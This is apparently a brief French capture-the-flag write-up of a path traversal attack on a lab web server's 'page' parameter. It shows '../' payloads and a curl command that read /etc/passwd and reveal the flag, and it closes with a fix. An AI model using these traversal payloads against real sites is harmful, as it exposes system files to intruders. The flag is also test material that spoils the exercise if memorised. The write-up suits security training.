Etape 1:
http://192.168.56.103/index.php?page=../						--> Wtf ?

humm interessant :)

Etape 2:
http://192.168.56.103/index.php?page=../../../../../../../../../../../			--> You can DO it !!!  :]

On est sur la bonne voie

Etape 3:
http://192.168.56.103/index.php?page=../../../../../../../../../../../etc/passwd	--> Congratulaton!! The flag is : b12c4b2cb8094750ae121a676269aa9e2872d07c06e429d25a63196ec1c8c1d0

On peux aussi: 
curl http://192.168.56.103/index.php\?page\=../../../../../../../../../../../etc/passwd | head


Congratulaton!! The flag is : b12c4b2cb8094750ae121a676269aa9e2872d07c06e429d25a63196ec1c8c1d0

Solution:
éliminer la possibilité d’utiliser “../” et forcer l’extension “.php”